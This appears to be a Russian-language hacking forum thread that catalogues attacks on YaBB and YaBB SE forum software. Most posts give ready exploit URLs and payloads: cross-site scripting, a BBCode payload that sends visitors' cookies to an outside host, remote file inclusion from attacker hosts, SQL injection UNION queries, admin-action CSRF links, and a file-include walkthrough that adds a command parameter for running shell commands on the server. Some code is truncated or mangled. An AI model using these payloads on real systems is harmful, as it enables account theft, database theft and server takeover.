![]() |
[Обзор Уязвимостей Yabb]
Начнёмс....
YaBB 1 Gold Уязвимость в YaBB(http://www.yabb.org/) позволяет удаленному пользователю вставлять произвольный код сценария в страницы сообщения об ошибках. Уязвимость может использоваться для кражи опознавательных мандатов пользователей YaBB, хранящихся в куки. Пример: Код:
http://some.site.com/cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert()</script>Пример: Код:
http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display; Пример: Код:
http://site.com/yapBB/include/global.php?GLOBAL[includeBit]=1&cfgIncludeDirectory=http://attacer.com/PHP код:
YaBB 1.3.2 Описание:Злонамеренный пользователь может опубликовать сообщение, содержащее изображение, которое ссылается на URL, используемый при выполнении административных действий. В результате административное действие будет автоматически выполнено, когда администратор читает сообщения форума. Пример: Код:
http://[victim]/YaBB.pl?board=;action=modifycat;id=[cateogoryname];moda=Remove2Описание:Межсайтовый скрптинг обнаружен в сценарии входа в систему Пример: Код:
http://example.com/forums/index.php?Код:
http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display;Описание:Проблема обнаружена в сценарии Reminder.php. Код:
http://www.myserver.com/yabbse/Reminder.php?Описание:Удаленный пользователь может выполнить XSS нападение. Пример: Код:
[glow=red);background:url(javascript:alert(document.cookie));filter:glow(color=red,2,300]Big Exploit[/glow]Описание:Уязвимость существует из-за недостаточной обработки входных данных в параметре "user" в сценарии Sources/Profile.php Возможность выполнять SQL команды в базе данных: Пример: [CODE]http://[host]/index.php?board=&action=viewprofile&user=YaBB SE 1.5.4, 1.5.5 Описание: Уязвимость обнаружена в параметре 'quote' Пример: Код:
http://localhost:8080/yabbse//indeОписание: Уязвимость обнаружена в YaBB SE в 'SSI.php'. Пример: Код:
http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=2)Код:
http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER =1+OR+1=1)Код:
http://[target]/yabbse/SSI.php?function=welcome&username=evilhaxor&ID_MEMBER=1+OR+1=2)+GROUP+BY+readBy+UNION+SELECT+ASCII(SUBSTRING(realName,1,1)+)+YaBB 2 XSS Позволяет украсть куки пользователей. Код:
[U*L]http://www.[U*L=http://wj.com/style=display:none;background:url(javascript:docum ent.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;) ]wj[/U*L][/U*L]SQL Error + XSS(passive 3шт.) Код:
http://site/forum/index.php?board='Код:
http://site/forum/index.php?board=1;action=display;threadid='Код:
http://site/forum<script>alert()</script>Код:
http://site/forumindex.php?board=1;action=icqpager;UIN=<script>alert()</script>Код:
http://site/forumindex.php?board=1;action=post;threadid=1;quot e=2;title=net</title><script>alert("hacked%20by")</script>Описание:Файл 'Packages.php' включает сценарий 'Packer.php Пример: Код:
http://[target]/yabbse/Sources/Packages.php?sourcedir=http://attacker/И неругайтесь сильно :( |
*************Внимание - Внимание*****************
Уважаемые пользователи, стыд да срам. Впредь флуд в этой теме, а также в подобных темах, будет строго наказываться. Это первое и последнее предупреждение. *************Внимание - Внимание***************** *************Attention - Attention***************** Dear users, shame on you. Flood in this and similar themes will be strictly punished from now. It is last warning *************Attention - Attention***************** |
include in mods autochecker
Базы инклудов + простой GET-чекер.
Download |
YaBBSM 3.0.0 (Offline.php) Remote File Include Vulnerability
Код:
[DESCRIPTION] Remote file include vuln found by sZ [oct 09, 2006] |
YaBB YaBB.pl IMSend Cross-Site Scripting Vulnerability
Код:
http://www.example.com/YaBB.pl?board=;action=imsend;to=%22%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E |
_http://www.securitylab.ru/vulnerability/298015.php
21 июня, 2007 Программа: YaBB 2.1, возможно более ранние версии. Опасность: Низкая Наличие эксплоита: Нет Описание: Уязвимость позволяет локальному пользователю повысить свои привилегии на системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "userlanguage" в сценарии YaBB.pl. Злоумышленник может просмотреть содержимое определенных файлов на системе. Для удачной эксплуатации уязвимости злоумышленнику требуется валидная учетная запись в приложении а также консоль или доступ по FTP к системе. ====== Может найдется желающий разобраться как работет баг и довести дело до конца(всмысле до эксплоита)? |
Дополнение к предыдущему посту - Local File Include Vulnerabilities in YaBB <= 2.1
Уязвимость присутствует в переменной $language, которую пользователь может менять в своем профиле.
Уязвимые скрипты, содержащие переменную $language: Sources/HelpCentre.pl, строка 139 Код:
if (-e ("$helpfile/$language/$help_area/$line.help")) { Код:
if (-e "$langdir/$use_lang/$what_to_load.lng") { Код:
if ($language) { require "$langdir/$language/ICQ.lng"; }Код:
if (-e "$langdir/$actlang/Notify.lng") { require "$langdir/$actlang/Notify.lng"; }Код:
if (-e "$langdir/$actlang/Notify.lng") { require "$langdir/$actlang/Notify.lng"; }Код:
if (-e "$langdir/$actlang/Notify.lng") { require "$langdir/$actlang/Notify.lng"; }Код:
if (-e "$langdir/$actlang/InstantMessage.lng") { require "$langdir/$actlang/InstantMessage.lng"; }Код:
if (-e "$langdir/$actlang/InstantMessage.lng") { require "$langdir/$actlang/Main.lng"; }Exploit Как было указано в предыдущем посте, для успешной эксплуатации уязвимости необходим доступ по FTP или SSH. Нужно изменить содержимое файла English/HelpCentre.lng с: Код:
%helptxt = ( Код:
$content="<br><br><br><br><font color=red>"; "../../путь/до/папки/English/" С помощью браузера переходим в раздел "Help": http://site.com/yabb2/YaBB.pl?action=help С помощью дописанной нами переменной 'cmd' можно выполнять произвольные команды на сервере: http://site.com/yabb2/YaBB.pl?action=help&cmd=id http://site.com/yabb2/YaBB.pl?action=help&cmd=uname% 20-a и т.п. Патч Для исправления уязвимости необходимо ввести фильтрацию переменной 'userlanguage' в модуле профиля пользователя. Для этого вносим изменения в код скрипта Sources/Profile.pl, строка 1225: этот кусок кода Код:
if ($member{'userlanguage'} !~ m^\A[0-9a-zA-Z_\.\#\%\-\:Код:
if ($member{'userlanguage'} !~ m^\A[0-9a-zA-Z_\.\#\%\-\: |
YaBB SE <= 1.5.5 Remote Command Execution
Remote Command Execution
Vulnerable: YaBB SE <= 1.5.5 Exploit: http://milw0rm.com/exploits/4963 |
YapBB <= 1.2 Blind SQL Injection Exploit
Код:
#!/usr/bin/perl |
| Время: 03:38 |